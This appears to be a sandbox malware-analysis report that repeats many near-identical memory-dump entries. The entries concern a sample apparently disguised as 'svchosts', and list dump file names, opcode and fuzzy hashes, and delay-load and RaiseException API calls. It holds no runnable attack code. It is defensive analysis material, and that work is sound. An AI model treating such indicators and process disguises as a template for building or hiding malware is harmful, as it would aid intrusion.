                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: dbc21d2f8989cfa3ba91b73622330a0e1b516b899b4db5db13742e8aa70cf864
                                                                      • Instruction ID: 4bada545c5a29893740db61cc50abc9c9fe581ad4ffed3eafac43fb27e591543
                                                                      • Opcode Fuzzy Hash: dbc21d2f8989cfa3ba91b73622330a0e1b516b899b4db5db13742e8aa70cf864
                                                                      • Instruction Fuzzy Hash: B6B012A127C401AF310D61046D0BE37039CC4C3B12730452EF10FD28C1DC805C3A0C31
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADAB2
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 134c36d5d8a47f24fe113b5ef696b6d2ae81a220e7afb91984ec73ad1d4f49b7
                                                                      • Instruction ID: 246688fae8601a38405caf8b2463827a8b85a18805915f2f946fdb24b8b267d6
                                                                      • Opcode Fuzzy Hash: 134c36d5d8a47f24fe113b5ef696b6d2ae81a220e7afb91984ec73ad1d4f49b7
                                                                      • Instruction Fuzzy Hash: 2DB012A627D041FE310871056D03E3B025CC0C3B11330C22FF40BC1855DC844D384831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADAB2
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: cc8dfc97d280480f1fd94acc46e4f170ca02aa16aa4b6f81e13c6e70e78ebc7b
                                                                      • Instruction ID: 88d9ebb50c7844fa7e457b315a2c72ef6b8ffea472a0cbd60ea04cea1b475108
                                                                      • Opcode Fuzzy Hash: cc8dfc97d280480f1fd94acc46e4f170ca02aa16aa4b6f81e13c6e70e78ebc7b
                                                                      • Instruction Fuzzy Hash: F8B0129627C041AE310871056C03F3F025CC0C7B11330862FF10BC1945DC804C3D4831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADAB2
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: ff073322e1449f9fd5247dffbd043d401283130099e6980a7e59201466bd8731
                                                                      • Instruction ID: 8ad5491476ddd5f59406a4f15b79d2ce878175ce62a251a7d815dd1a7e8a0b86
                                                                      • Opcode Fuzzy Hash: ff073322e1449f9fd5247dffbd043d401283130099e6980a7e59201466bd8731
                                                                      • Instruction Fuzzy Hash: 44B012962BC145AE310871056C03F3B025CD0C3B11330422FF00BC1845DC804C384D31
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADBD5
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: c3ed9e45e8129da07e7a159d5bc9241813908a21b6a7d80225ad04321789faef
                                                                      • Instruction ID: f3bb2784e169f0be1930a8653e0a840c9a0c8f63ffd1890de71a9bfc5972933e
                                                                      • Opcode Fuzzy Hash: c3ed9e45e8129da07e7a159d5bc9241813908a21b6a7d80225ad04321789faef
                                                                      • Instruction Fuzzy Hash: 86B09296279006AE210851442807E770228C08AF10320892EB50AC2840DD804C394831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADBD5
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 62000714edc6530a4a732a4714a3b6c2a57a992b14ee664826547126f13c3625
                                                                      • Instruction ID: f889084d74313704120f8d1e585330da5d31af009ca09e8547c38d612d4b5afa
                                                                      • Opcode Fuzzy Hash: 62000714edc6530a4a732a4714a3b6c2a57a992b14ee664826547126f13c3625
                                                                      • Instruction Fuzzy Hash: ACB0129637C006AF310C51442D07E77022CC0CBF10330892EF20BC1840DD804C3A4831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADBD5
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: e4be8f2f21155c2dfadcc6aa2993d5226eebdcfa976d63da35ac57b14692edb8
                                                                      • Instruction ID: 9c0f38819bd8cb09b1f45d9a1b23015bedce923adacbd1bbb5f1a263ea09847c
                                                                      • Opcode Fuzzy Hash: e4be8f2f21155c2dfadcc6aa2993d5226eebdcfa976d63da35ac57b14692edb8
                                                                      • Instruction Fuzzy Hash: 3CB0129637C10ABE320811402C07D77022CC0C7F103304A3EF107D0840DD804C7D4831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADBD5
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: c5bf2759c8f9eee9c4e9fb8c4c5c30380945125b8bee496e3b614f3519b87a65
                                                                      • Instruction ID: 50360c1edbbb961f6682e10c51599b5955265fd64240847e5172316051666b9e
                                                                      • Opcode Fuzzy Hash: c5bf2759c8f9eee9c4e9fb8c4c5c30380945125b8bee496e3b614f3519b87a65
                                                                      • Instruction Fuzzy Hash: 49B0129637C005AE310851542C17F37022CD0DBF10330493EF10BD1D40DD808C3D4831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADC36
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: d8790dc1fc027a640845ecd66250e0278c637a6f602e37fc8f5c31ea13d32756
                                                                      • Instruction ID: f5293922ee2e24b955dce16912125154e67610f87fdba53ce7d6c6f75371542d
                                                                      • Opcode Fuzzy Hash: d8790dc1fc027a640845ecd66250e0278c637a6f602e37fc8f5c31ea13d32756
                                                                      • Instruction Fuzzy Hash: 9CB09299278209AE210821106A02E37822DC1C2F20360462AB20AE084299805C685435
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADC36
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 1a0e0ae465696b8631e43bc031ada4bef543ac382377fc94114d5c5e5db56202
                                                                      • Instruction ID: b96df59f0c39ce07aceec9d7ad745e32cedc1bc4757785627b05250054595f45
                                                                      • Opcode Fuzzy Hash: 1a0e0ae465696b8631e43bc031ada4bef543ac382377fc94114d5c5e5db56202
                                                                      • Instruction Fuzzy Hash: 53B09299278209AE310861146802E37422CC0C2F20360462BB20AD1842D9805C284435
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADC36
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 0fa491ddc9948ed0d4466c253787ebb8d33c5ff2b8783a26fcbd5fe2a7d0a5ac
                                                                      • Instruction ID: fd85bf77e3e4a2b12fa0ec5df5568838672a3395dfed0f3482d73bc8dedf3f25
                                                                      • Opcode Fuzzy Hash: 0fa491ddc9948ed0d4466c253787ebb8d33c5ff2b8783a26fcbd5fe2a7d0a5ac
                                                                      • Instruction Fuzzy Hash: 54B09299279109AE220861146802E37422CC0C7F20360862AB60AD1842D9805C284435
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 7eaddecdecc463028cf4b501b0b41fe1a47944d17d5483a6e06287408d23cb31
                                                                      • Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
                                                                      • Opcode Fuzzy Hash: 7eaddecdecc463028cf4b501b0b41fe1a47944d17d5483a6e06287408d23cb31
                                                                      • Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: a5adf479c082e22d793de0db7795db5b34863d78ad7eabf77883771f969a4c0c
                                                                      • Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
                                                                      • Opcode Fuzzy Hash: a5adf479c082e22d793de0db7795db5b34863d78ad7eabf77883771f969a4c0c
                                                                      • Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 8db8d965bfc03adbc5d921ea4b6fcc1eb1b3f95e7417c9861029ae0b858097ff
                                                                      • Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
                                                                      • Opcode Fuzzy Hash: 8db8d965bfc03adbc5d921ea4b6fcc1eb1b3f95e7417c9861029ae0b858097ff
                                                                      • Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 0c0726064a366fea7bb25f1f9520afd85dae7936a6d19ef4c9e8027b259cdf7f
                                                                      • Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
                                                                      • Opcode Fuzzy Hash: 0c0726064a366fea7bb25f1f9520afd85dae7936a6d19ef4c9e8027b259cdf7f
                                                                      • Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
